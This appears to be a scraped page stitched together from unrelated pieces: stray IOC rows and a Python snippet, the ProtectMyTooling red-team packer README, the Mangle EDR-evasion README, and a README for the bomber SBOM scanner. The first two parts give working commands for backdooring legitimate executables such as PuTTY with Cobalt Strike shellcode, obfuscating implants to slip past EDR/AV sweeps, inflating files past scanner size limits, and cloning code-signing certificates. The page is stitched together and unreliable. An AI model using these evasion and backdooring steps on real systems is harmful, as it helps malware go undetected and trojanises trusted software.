2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),test,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Output obfuscated artifact,test,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d
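Producing such rows boils down to hashing every intermediate artifact; a minimal Python sketch (column set trimmed: computing imphash would additionally require a PE parser such as pefile, and the ioc_row helper is hypothetical):

```python
import csv
import hashlib
import io
from datetime import datetime

def ioc_row(filename: str, data: bytes, author: str, context: str, comment: str) -> list:
    """One IOC evidence row: timestamp, provenance columns, then the hashes."""
    return [
        datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        filename, author, context, comment,
        hashlib.md5(data).hexdigest(),
        hashlib.sha1(data).hexdigest(),
        hashlib.sha256(data).hexdigest(),
    ]

buf = io.StringIO()
writer = csv.writer(buf)
writer.writerow(["timestamp", "filename", "author", "context", "comment",
                 "md5", "sha1", "sha256"])
writer.writerow(ioc_row("beacon.exe", b"MZ", "operator@host", "Input File", "test"))
```

Emitting one row per packer stage (input file, each intermediate, final output) is what makes the CSV usable for IOC matching later.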
ProtectMyTooling was designed to support not only obfuscators/packers but also all sorts of builders/generators/shellcode loaders usable from the command line.
At the moment, the program supports various commercial and open-source packers/obfuscators. The open-source ones are bundled with the project; commercial ones require the user to purchase the product and configure its location in the ProtectMyTooling.yaml file so the script knows where to find them.
Amber
- Reflective PE Packer that takes EXE/DLL on input and produces EXE/PIC shellcode
AsStrongAsFuck
- A console obfuscator for .NET assemblies by Charterino
CallObfuscator
- Obfuscates specific Windows APIs with different APIs.
ConfuserEx
- Popular .NET obfuscator, forked from Martin Karing
Donut
- Popular PE loader that takes EXE/DLL/.NET on input and produces a PIC shellcode
Enigma
- A powerful system designed for comprehensive protection of executable files
Hyperion
- runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation based on the paper "Hyperion: Implementation of a PE-Crypter"
IntelliLock
- combines strong license security and highly adaptable licensing functionality/schema with reliable assembly protection
InvObf
- Obfuscates PowerShell scripts with Invoke-Obfuscation
(by Daniel Bohannon)
LoGiC.NET
- A more advanced free and open .NET obfuscator using dnlib, by AnErrupTion
Mangle
- Takes an input EXE/DLL file and produces an output one with a cloned certificate, removed Golang-specific IoCs and bloated size. By Matt Eidelberg (@Tyl0us).
MPRESS
- MPRESS compressor by Vitaly Evseenko. Takes input EXE/DLL/.NET/MAC-DARWIN (x86/x64) and compresses it.
NetReactor
- Unmatched .NET code protection system which completely stops anyone from decompiling your code
NetShrink
- an exe packer aka executable compressor, application password protector and virtual DLL binder for Windows & Linux .NET applications.
Nimcrypt2
- Generates a Nim loader running input .NET, PE or raw shellcode. Authored by @icyguider
NimPackt-v1
- Takes shellcode or a .NET executable on input, produces an EXE or DLL loader. Brought to you by Cas van Cooten (@chvancooten)
NimSyscallPacker
- Takes a PE/shellcode/.NET executable and generates a robust Nim+syscalls EXE/DLL loader. Sponsorware authored by @S3cur3Th1sSh1t
Packer64
- wrapper around John Adams' Packer64
pe2shc
- Converts a PE into shellcode. By yours truly, @hasherezade
peCloak
- A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool
peresed
- Uses "peresed" from avast/pe_tools to remove all existing PE resources and signature (think of the Mimikatz icon).
ScareCrow
- EDR-evasive x64 shellcode loader that produces DLL/CPL/XLL/JScript/HTA artifact loaders
sgn
- Shikata ga nai (仕方がない) encoder ported into Go with several improvements. Takes shellcode, produces encoded shellcode
SmartAssembly
- obfuscator that helps protect your application against reverse-engineering or modification, by making it difficult for a third party to access your source code
sRDI
- Convert DLLs to position-independent shellcode. Authored by Nick Landers, @monoxgas
Themida
- Advanced Windows software protection system
UPX
- a free, portable, extendable, high-performance executable packer for several executable formats.
VMProtect
- protects code by executing it on a virtual machine with a non-standard architecture that makes it extremely difficult to analyze and crack the software
You can quickly list supported packers using the -L
option (table columns are chosen depending on terminal width; the wider the terminal, the more information revealed):
C:\> py ProtectMyTooling.py -L
[...]
Red Team implants protection swiss knife.
Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| # | Name | Type | Licensing | Input | Output | Author |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| 1 | amber | open-source | Shellcode Loader | PE | EXE, Shellcode | Ege Balci |
| 2 | asstrongasfuck | open-source | .NET Obfuscator | .NET | .NET | Charterino, klezVirus |
| 3 | backdoor | open-source | Shellcode Loader | Shellcode | PE | Mariusz Banach, @mariuszbit |
| 4 | callobf | open-source | PE EXE/DLL Protector | PE | PE | Mustafa Mahmoud, @d35ha |
| 5 | confuserex | open-source | .NET Obfuscator | .NET | .NET | mkaring |
| 6 | donut-packer | open-source | Shellcode Converter | PE, .NET, VBScript, JScript | Shellcode | TheWover |
| 7 | enigma | commercial | PE EXE/DLL Protector | PE | PE | The Enigma Protector Developers Team |
| 8 | hyperion | open-source | PE EXE/DLL Protector | PE | PE | nullsecurity team |
| 9 | intellilock | commercial | .NET Obfuscator | PE | PE | Eziriz |
| 10 | invobf | open-source | Powershell Obfuscator | Powershell | Powershell | Daniel Bohannon |
| 11 | logicnet | open-source | .NET Obfuscator | .NET | .NET | AnErrupTion, klezVirus |
| 12 | mangle | open-source | Executable Signing | PE | PE | Matt Eidelberg (@Tyl0us) |
| 13 | mpress | freeware | PE EXE/DLL Compressor | PE | PE | Vitaly Evseenko |
| 14 | netreactor | commercial | .NET Obfuscator | .NET | .NET | Eziriz |
| 15 | netshrink | open-source | .NET Obfuscator | .NET | .NET | Bartosz Wójcik |
| 16 | nimcrypt2 | open-source | Shellcode Loader | PE, .NET, Shellcode | PE | @icyguider |
| 17 | nimpackt | open-source | Shellcode Loader | .NET, Shellcode | PE | Cas van Cooten (@chvancooten) |
| 18 | nimsyscall | sponsorware | Shellcode Loader | PE, .NET, Shellcode | PE | @S3cur3Th1sSh1t |
| 19 | packer64 | open-source | PE EXE/DLL Compressor | PE | PE | John Adams, @jadams |
| 20 | pe2shc | open-source | Shellcode Converter | PE | Shellcode | @hasherezade |
| 21 | pecloak | open-source | PE EXE/DLL Protector | PE | PE | Mike Czumak, @SecuritySift, buherator / v-p-b |
| 22 | peresed | open-source | PE EXE/DLL Protector | PE | PE | Martin Vejnár, Avast |
| 23 | scarecrow | open-source | Shellcode Loader | Shellcode | DLL, JScript, CPL, XLL | Matt Eidelberg (@Tyl0us) |
| 24 | sgn | open-source | Shellcode Encoder | Shellcode | Shellcode | Ege Balci |
| 25 | smartassembly | commercial | .NET Obfuscator | .NET | .NET | Red-Gate |
| 26 | srdi | open-source | Shellcode Encoder | DLL | Shellcode | Nick Landers, @monoxgas |
| 27 | themida | commercial | PE EXE/DLL Protector | PE | PE | Oreans |
| 28 | upx | open-source | PE EXE/DLL Compressor | PE | PE | Markus F.X.J. Oberhumer, László Molnár, John F. Reiser |
| 29 | vmprotect | commercial | PE EXE/DLL Protector | PE | PE | vmpsoft |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
Above are the packers that are supported, but that doesn't mean you have them all configured and ready to use. To prepare them for use, you must first supply the necessary binaries in the contrib
directory and then configure your YAML file accordingly.
This program is intended for professional Red Teams and fits perfectly into a typical implant-development CI/CD pipeline. As a red teamer, I'm always expected to deliver a decent-quality list of IOCs matching back to all of my implants, and I find it essential to watermark all my implants for bookkeeping, attribution and traceability purposes.
To accommodate these requirements, ProtectMyTooling brings basic support for both.
ProtectMyTooling
can apply watermarks after obfuscation rounds simply by using the --watermark
option:
py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w section=.coco,ALLYOURBASEAREBELONG
There is also a standalone approach, included in the RedWatermarker.py
script.
It takes an executable artifact on input and accepts a few parameters denoting where to inject a watermark and what value shall be inserted.
The example run below sets the PE checksum to 0xAABBCCDD, inserts fooooobar
into the PE file's DOS stub (the bytes containing "This program cannot be run..."), appends bazbazbaz
to the file's overlay, and then creates a new PE section named .coco
, appends it to the end of the file and fills that section with the preset marker.
py RedWatermarker.py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG
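Of these, the checksum watermark is the easiest to picture: the PE CheckSum field sits at a fixed offset inside the optional header. Below is a minimal, hypothetical Python sketch of that single step (not RedWatermarker's actual code):

```python
import struct

def preset_checksum(pe: bytearray, value: int) -> None:
    # e_lfanew (the offset of the PE header) lives at 0x3C in the DOS header;
    # IMAGE_OPTIONAL_HEADER.CheckSum sits 0x58 bytes into the PE header for
    # both PE32 and PE32+ images.
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    struct.pack_into("<I", pe, e_lfanew + 0x58, value)

# Demo on a fake header buffer (not a real PE):
buf = bytearray(0x200)
struct.pack_into("<I", buf, 0x3C, 0x80)  # pretend the PE header starts at 0x80
preset_checksum(buf, 0xAABBCCDD)
```

Windows never validates this field for regular executables, which is what makes it a convenient place to stash a marker.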
Full watermarker usage:
cmd> py RedWatermarker.py --help
;
ED.
,E#Wi
j. f#iE###G.
EW, .E#t E#fD#W;
E##j i#W, E#t t##L
E###D. L#D. E#t .E#K,
E#jG#W; :K#Wfff; E#t j##f
E#t t##f i##WLLLLtE#t :E#K:
E#t :K#E: .E#L E#t t##L
E#KDDDD###i f#E: E#t .D#W; ,; G: ,;
E#f,t#Wi,,, ,WW; E#tiW#G. f#i j. j. E#, : f#i j.
E#t ;#W: ; .D#;E#K##i .. GEEEEEEEL .E#t EW, .. : .. EW, E#t .GE .E#t EW,
DWi ,K.DL ttE##D. ;W, ,;;L#K;;. i#W, E##j ,W, .Et ;W, E##j E#t j#K; i#W, E##j
f. :K#L LWL E#t j##, t#E L#D. E###D. t##, ,W#t j##, E###D. E#GK#f L#D. E###D.
EW: ;W##L .E#f L: G###, t#E :K#Wfff; E#jG#W; L###, j###t G###, E#jG#W; E##D. :K#Wfff; E#jG#W;
E#t t#KE#L ,W#; :E####, t#E i##WLLLLt E#t t##f .E#j##, G#fE#t :E####, E#t t##f E##Wi i##WLLLLt E#t t##f
E#t f#D.L#L t#K: ;W#DG##, t#E .E#L E#t :K#E: ;WW; ##,:K#i E#t ;W#DG##, E#t :K#E:E#jL#D: .E#L E#t :K#E:
E#jG#f L#LL#G j###DW##, t#E f#E: E#KDDDD###i j#E. ##f#W, E#t j###DW##, E#KDDDD###E#t ,K#j f#E: E#KDDDD###i
E###; L###j G##i,,G##, t#E ,WW; E#f,t#Wi,,,.D#L ###K: E#t G##i,,G##, E#f,t#Wi,,E#t jD ,WW; E#f,t#Wi,,,
E#K: L#W; :K#K: L##, t#E .D#; E#t ;#W: :K#t ##D. E#t :K#K: L##, E#t ;#W: j#t .D#; E#t ;#W:
EG LE. ;##D. L##, fE tt DWi ,KK:... #G .. ;##D. L##, DWi ,KK: ,; tt DWi ,KK:
; ;@ ,,, .,, : j ,,, .,,
Watermark thy implants, track them in VirusTotal
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
usage: RedWatermarker.py [options] <infile>
options:
-h, --help show this help message and exit
Required arguments:
infile Input implant file
Optional arguments:
-C, --check Do not actually inject watermark. Check input file if it contains specified watermarks.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.
PE Executables Watermarking:
-t STR, --dos-stub STR
Insert watermark into PE DOS Stub (This program cannot be run...).
-c NUM, --checksum NUM
Preset PE checksum with this value (4 bytes). Must be number. Can start with 0x for hex value.
-e STR, --overlay STR
Append watermark to the file's Overlay (at the end of the file).
-s NAME,STR, --section NAME,STR
Append a new PE section named NAME and insert watermark there. Section name must be shorter than 8 characters. Section will be marked Read-Only, non-executable.
Currently only PE files watermarking is supported, but in the future Office documents and other formats are to be added as well.
IOCs may be collected simply by using the -i
option in a ProtectMyTooling
run.
They're collected at several phases of processing and will contain the following fields, saved in the form of a CSV file:
timestamp
filename
author
- formed as username@hostname
context
- whether a record points to an input, output or intermediary file
comment
- value adjusted by the user through the -I value
option
md5
sha1
sha256
imphash
- PE Imports Hash, if available
typeref_hash
- .NET TypeRef Hash, if available
The result will be a CSV file named outfile-ioc.csv
stored side by side with the generated output artifact. That file is written in APPEND mode, meaning it will receive all subsequent IOCs.
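To illustrate what one row of that CSV captures, here is a hypothetical Python sketch (not the tool's actual implementation; imphash and typeref_hash are omitted since they require a PE/.NET parser):

```python
import csv
import getpass
import hashlib
import socket
from datetime import datetime
from pathlib import Path

def ioc_record(path: str, context: str, comment: str = "") -> dict:
    """Build one IOC row for a given artifact file."""
    data = Path(path).read_bytes()
    return {
        "timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        "filename": Path(path).name,
        "author": f"{getpass.getuser()}@{socket.gethostname()}",
        "context": context,   # input / output / intermediary
        "comment": comment,   # whatever the user passed via -I
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }

def append_ioc_csv(csv_path: str, record: dict) -> None:
    """Append one record, writing the header only on first use (APPEND mode)."""
    is_new = not Path(csv_path).exists()
    with open(csv_path, "a", newline="") as f:
        writer = csv.DictWriter(f, fieldnames=list(record))
        if is_new:
            writer.writeheader()
        writer.writerow(record)
```

Append mode means every obfuscation round simply adds rows, so one file accumulates the hashes of all intermediary and final artifacts.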
ProtectMyTooling
utilizes my own RedBackdoorer.py
script, which provides a few methods for backdooring PE executables. Support comes as a dedicated packer named backdoor
. Example usage:
The following takes Cobalt Strike shellcode on input, encodes it with SGN (Shikata Ga Nai), then backdoors SysInternals DbgView64.exe and produces an Amber EXE reflective loader
PS> py ProtectMyTooling.py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe
::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88"888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM
Red Team implants protection swiss knife.
Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15
[.] Processing x64 file : beacon64.bin
[>] Generating output of sgn(<file>)...
[>] Generating output of backdoor(sgn(<file>))...
[>] Generating output of Amber(backdoor(sgn(<file>)))...
[+] SUCCEEDED. Original file size: 265959 bytes, new file size Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%
Full RedBackdoorer usage:
cmd> py RedBackdoorer.py --help
██▀███ ▓█████▓█████▄
▓██ ▒ ██▓█ ▀▒██▀ ██▌
▓██ ░▄█ ▒███ ░██ █▌
▒██▀▀█▄ ▒▓█ ▄░▓█▄ ▌
░██▓ ▒██░▒████░▒████▓
░ ▒▓ ░▒▓░░ ▒░ ░▒▒▓ ▒
░▒ ░ ▒░░ ░ ░░ ▒ ▒
░░   ░ ░   ░    ░ ░
▄▄▄▄ ▄▄▄░ ░ ▄████▄ ██ ▄█▓█████▄ ▒█████ ▒█████ ██▀███ ▓█████ ██▀███
▓█████▄▒████▄ ░▒██▀ ▀█ ██▄█▒▒██▀ ██▒██▒ ██▒██▒ ██▓██ ▒ ██▓█ ▀▓██ ▒ ██▒
▒██▒ ▄█▒██ ▀█▄ ▒▓█ ▄▓███▄░░██ █▒██░ ██▒██░ ██▓██ ░▄█ ▒███ ▓██ ░▄█ ▒
▒██░█▀ ░██▄▄▄▄██▒▓▓▄ ▄██▓██ █▄░▓█▄ ▒██ ██▒██ ██▒██▀▀█▄ ▒▓█ ▄▒██▀▀█▄
░▓█ ▀█▓▓█ ▓██▒ ▓███▀ ▒██▒ █░▒████▓░ ████▓▒ ░ ████▓▒░██▓ ▒██░▒████░██▓ ▒██▒
░▒▓███▀▒▒▒ ▓▒█░ ░▒ ▒ ▒ ▒▒ ▓▒▒▒▓ ▒░ ▒░▒░▒░░ ▒░▒░▒░░ ▒▓ ░▒▓░░ ▒░ ░ ▒▓ ░▒▓░
▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░░ ▒ ▒ ░ ▒ ▒░ ░ ▒ ▒░ ░▒ ░ ▒░░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ▒ ░░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░
Your finest PE backdooring companion.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
usage: RedBackdoorer.py [options] <mode> <shellcode> <infile>
options:
-h, --help show this help message and exit
Required arguments:
mode PE Injection mode, see help epilog for more details.
shellcode Input shellcode file
infile PE file to backdoor
Optional arguments:
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.
-v, --verbose Verbose mode.
Backdooring options:
-n NAME, --section-name NAME
If shellcode is to be injected into a new PE section, define that section name. Section name must not be longer than 7 characters. Default: .qcsw
-i IOC, --ioc IOC Append IOC watermark to injected shellcode to facilitate implant tracking.
Authenticode signature options:
-r, --remove-signature
Remove PE Authenticode digital signature since it's going to be invalidated anyway.
------------------
PE Backdooring <mode> consists of two comma-separated options.
First one denotes where to store shellcode, second how to run it:
<mode>
save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
|
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section
Example:
py RedBackdoorer.py 1,2 beacon.bin putty.exe putty-infected.exe
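To make the scheme concrete, here is a tiny hypothetical decoder of the <mode> string (illustration only, not RedBackdoorer's code):

```python
# Hypothetical decoder for RedBackdoorer's "save,run" mode pair.
STORE = {
    1: "store shellcode in the middle of a code section",
    2: "append shellcode to the PE file in a new PE section",
}
RUN = {
    1: "change AddressOfEntryPoint",
    2: "hijack branching instruction at Original Entry Point",
    3: "setup TLS callback",
}

def parse_mode(mode: str) -> tuple:
    """Split 'save,run' into its two human-readable halves."""
    save, run = (int(x) for x in mode.split(","))
    return STORE[save], RUN[run]

# "1,2" = store in a code section, hijack the OEP branch:
print(parse_mode("1,2"))
```

So the example above ("1,2") stores the beacon inside putty.exe's code section and patches the branching instruction at the original entry point to reach it.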
There is also a script that integrates ProtectMyTooling.py
as a wrapper around the configured PE/.NET packers/protectors in order to easily transform input executables into their protected and compressed output forms and then upload or use them from within Cobalt Strike.
The idea is to have an automated process of protecting all of the uploaded binaries or .NET assemblies used by execute-assembly and forget about protecting or obfuscating them manually before each usage. The added benefit of an automated approach to transform executables is the ability to have the same executable protected each time it's used, resulting in unique samples launched on target machines. That should nicely deceive EDR/AV enterprise-wide IOC sweeps while looking for the same artefact on different machines.
Additionally, the protected-execute-assembly command has the ability to look for assemblies for which only a name was given in a preconfigured assemblies directory (set in the dotnet_assemblies_directory setting).
To use it:
Load CobaltStrike/ProtectMyTooling.cna
in your Cobalt Strike. Two new commands become available:
protected-execute-assembly
- Executes a local, previously protected and compressed .NET program in-memory on the target.
protected-upload
- Takes an input file, protects it if it's a PE executable and then uploads that file to the specified remote location.
Basically, these commands open input files, pass them first to the CobaltStrike/cobaltProtectMyTooling.py
script, which in turn calls out to ProtectMyTooling.py
. As soon as the binary gets obfuscated, it is passed to your beacon for execution/uploading.
Here's a list of options required by the Cobalt Strike integrator:
python3_interpreter_path
- Specify a path to the Python3 interpreter executable
protect_my_tooling_dir
- Specify a path to the ProtectMyTooling main directory
protect_my_tooling_config
- Specify a path to the ProtectMyTooling configuration file with various packers' options
dotnet_assemblies_directory
- Specify the local path where .NET assemblies should be looked for if not found by execute-assembly
cache_protected_executables
- Enable to cache already protected executables and reuse them when needed
protected_executables_cache_dir
- Specify a path to a directory that should store cached protected executables
default_exe_x86_packers_chain
- Native x86 EXE executables protectors/packers chain
default_exe_x64_packers_chain
- Native x64 EXE executables protectors/packers chain
default_dll_x86_packers_chain
- Native x86 DLL executables protectors/packers chain
default_dll_x64_packers_chain
- Native x64 DLL executables protectors/packers chain
default_dotnet_packers_chain
- .NET executables protectors/packers chain
ScareCrow
is very tricky to run from Windows. What worked for me is the following:
WSL installed (bash.exe
command available in Windows)
golang
installed in WSL at version 1.16+
(tested on 1.18
)
PackerScareCrow.Run_ScareCrow_On_Windows_As_WSL = True
set
setAll packer, obfuscator, converter, loader credits goes to their authors. This tool is merely a wrapper around their technology!
ProtectMyTooling also uses denim.exe
by moloch-- by some Nim-based packers.
GadgetToJScript
Limelighter
PEZor
msfvenom
- two variants, one for input shellcode, the other for executables
- two variants, one for input shellcode, the other for executableUse of this tool as well as any other projects I'm author of for illegal purposes, unsolicited hacking, cyber-espionage is strictly prohibited. This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel in improving their customer networks cyber-defence capabilities.
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.
If there are concerns, copyright issues, threats posed by this software or other inquiries - I am open to collaborate in responsibly addressing them.
The tool exposes a handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, and therefore does not introduce any immediately new threats to the cyber-security landscape as such.
This and other projects are the outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, consider buying me a coffee (or better, a beer) just to say thank you!
Mariusz Banach / mgeeky, '20-'22
<mb [at] binary-offensive.com>
(https://github.com/mgeeky)
Authored By Tyl0us
Featured at Source Zero Con 2022
Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners.
Mangle was developed in Golang.
The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:
go get github.com/Binject/debug/pe
Then build it:
go build Mangle.go
While Mangle is written in Golang, many of its features are designed to work on executable files from other languages. At the time of release, the only Golang-specific feature is the string manipulation part.
./mangle -h
_____ .__
/ \ _____ ____ ____ | | ____
/ \ / \\__ \ / \ / ___\| | _/ __ \
/ Y \/ __ \| | \/ /_/ > |_\ ___/
\____|__ (____ /___| /\___ /|____/\___ >
\/ \/ \//_____/ \/
(@Tyl0us)
Usage of ./Mangle:
-C string
Path to the file containing the certificate you want to clone
-I string
Path to the original file
-M Edit the PE file to strip out Go indicators
-O string
The new file name
-S int
How many MBs to increase the file by
Mangle takes the input executable and looks for known strings that security products look for or alert on. These strings alone are not the sole point of detection. Often, these strings are in conjunction with other data points and pieces of telemetry for detection and prevention. Mangle finds these known strings and replaces the hex values with random ones to remove them. IMPORTANT: Mangle replaces the exact size of the strings it’s manipulating. It doesn’t add any more or any less, as this would create misalignments and instabilities in the file. Mangle does this using the -M
command-line option.
Currently, Mangle only handles Golang files, but as time goes on other languages will be added. If you know of any such strings for other languages, please open an issue ticket and submit them.
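The same-length replacement rule can be sketched in a few lines of Python (a conceptual illustration, not Mangle's Go implementation):

```python
import os

def scrub(data: bytes, needle: bytes) -> bytes:
    """Replace every occurrence of needle with random bytes of the exact
    same length, so the file size and all offsets stay untouched."""
    out = bytearray(data)
    start = 0
    while (i := out.find(needle, start)) != -1:
        out[i:i + len(needle)] = os.urandom(len(needle))
        start = i + len(needle)
    return bytes(out)
```

Because the replacement is byte-for-byte, no pointers, relocations or section sizes inside the executable shift, which is exactly why Mangle insists on never adding or removing bytes.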
Before
After
Pretty much all EDRs can't scan on-disk or in-memory files beyond a certain size. This simply stems from the fact that large files take longer to review, scan or monitor, and EDRs do not want to impact performance by slowing down the user's productivity. Mangle inflates files by adding padding of null bytes (zeros) at the end of the file. This ensures that nothing inside the file is impacted. To inflate an executable, use the -S
command-line option along with the number of megabytes you want to add to the file. Large payloads are not really an issue anymore with how fast Internet speeds are; that being said, it's not recommended to make a 2 GB file.
Based on test cases across numerous userland and kernel EDRs, it is recommended to increase the size by 95-100 megabytes. Because vendors do not check large files, the activity goes unnoticed, resulting in the successful execution of shellcode.
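Conceptually, the inflation step just appends null padding past the end of the image, which loaders ignore; a rough, hypothetical Python equivalent:

```python
def inflate(path: str, megabytes: int) -> None:
    """Append `megabytes` MB of zero bytes after the PE overlay.

    Padding past the end of the image is never mapped or executed,
    so nothing inside the file is impacted."""
    with open(path, "ab") as f:
        for _ in range(megabytes):
            f.write(b"\x00" * (1024 * 1024))
```

A chunked write like this avoids allocating the whole padding buffer at once when inflating by tens of megabytes.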
Mangle also contains the ability to take the full chain and all attributes from a legitimate code-signing certificate from a file and copy it onto another file. This includes the signing date, counter signatures, and other measurable attributes.
While this feature may sound similar to another tool I developed, Limelighter, the major difference between the two is that Limelighter makes a fake certificate based on a domain and signs it with the current date and time, whereas Mangle copies valid attributes, with the timestamp taken from when the original file was signed. This option can copy from DLL or .exe files using the -C
command-line option, along with the path to the file you want to copy the certificate from.
bomber
is an application that scans SBOMs for security vulnerabilities.
So you've asked a vendor for a Software Bill of Materials (SBOM) for one of their closed-source products, and they provided one to you in a JSON file... now what?
The first thing you're going to want to do is see if any of the components listed inside the SBOM have security vulnerabilities, and what kind of licenses these components have. This will help you identify what kind of risk you will be taking on by using the product. Finding security vulnerabilities and license information for components identified in an SBOM is exactly what bomber
is meant to do. bomber
can read any JSON or XML based CycloneDX format, or a JSON SPDX or Syft formatted SBOM, and tell you pretty quickly if there are any vulnerabilities.
There are quite a few SBOM formats available today. bomber
supports the following:
bomber
supports multiple sources for vulnerability information. We call these providers. Currently, bomber
uses OSV as the default provider, but you can also use the Sonatype OSS Index.
Please note that each provider supports different ecosystems, so if you're not seeing any vulnerabilities in one, try another. It is also important to understand that each provider may report different vulnerabilities. If in doubt, look at a few of them.
If bomber
does not find any vulnerabilities, it doesn't mean that there aren't any. All it means is that the provider being used didn't detect any, or it doesn't support the ecosystem. Some providers have vulnerabilities that come back with no Severity information. In this case, the Severity will be listed as "UNDEFINED".
An ecosystem is simply the package manager, or type of package. Examples include rpm, npm, gems, etc. Each provider supports different ecosystems.
OSV is the default provider for bomber
. It is an open, precise, and distributed approach to producing and consuming vulnerability information for open source.
You don't need to register for any service, get a password, or a token. Just use bomber
without a provider flag and away you go like this:
bomber scan test.cyclonedx.json
At this time, the OSV supports the following ecosystems:
and others...
The OSV provider is pretty slow right now when processing large SBOMs. At the time of this writing, their batch endpoint is not functioning, so bomber
needs to call their API one package at a time.
Additionally, there are cases where OSV does not return a Severity, or a CVE/CWE. In these rare cases, bomber
will output "UNSPECIFIED", and "UNDEFINED" respectively.
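For reference, a single-package OSV query is just a small JSON body keyed on the package URL, POSTed to https://api.osv.dev/v1/query. A hypothetical Python sketch of building that body (the HTTP request itself is omitted; bomber is written in Go, this only illustrates the payload shape):

```python
import json

def osv_query_body(purl: str) -> bytes:
    """Build the JSON body for POST https://api.osv.dev/v1/query,
    asking for vulnerabilities affecting a single package by PURL."""
    return json.dumps({"package": {"purl": purl}}).encode()

body = osv_query_body("pkg:npm/lodash@4.17.20")
```

One such request per component is why a large SBOM is slow to process while the batch endpoint is unavailable.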
In order to use bomber
with the Sonatype OSS Index you need to get an account. Head over to the site, and create a free account, and make note of your username
(this will be the email that you registered with).
Once you log in, you'll want to navigate to your settings and make note of your API token
. Please don't share your token with anyone.
At this time, the Sonatype OSS Index supports the following ecosystems:
You can use Homebrew to install bomber
using the following:
brew tap devops-kung-fu/homebrew-tap
brew install devops-kung-fu/homebrew-tap/bomber
If you do not have Homebrew, you can still download the latest release (ex: bomber_0.1.0_darwin_all.tar.gz
), extract the files from the archive, and use the bomber
binary.
If you wish, you can move the bomber
binary to your /usr/local/bin
directory or anywhere on your path.
To install bomber
, download the latest release for your platform and install locally. For example, install bomber
on Ubuntu:
dpkg -i bomber_0.1.0_linux_arm64.deb
You can scan either an entire folder of SBOMs or an individual SBOM with bomber
. bomber
doesn't care if you have multiple formats in a single folder. It'll sort everything out for you.
Note that the default output for bomber
is to STDOUT. Options to output in HTML or JSON are described later in this document.
# Using OSV (the default provider) which does not require any credentials
bomber scan spdx.sbom.json
# Using a provider that requires credentials (ossindex)
bomber scan --provider=xxx --username=xxx --token=xxx spdx-sbom.json
If the provider finds vulnerabilities you'll see an output similar to the following:
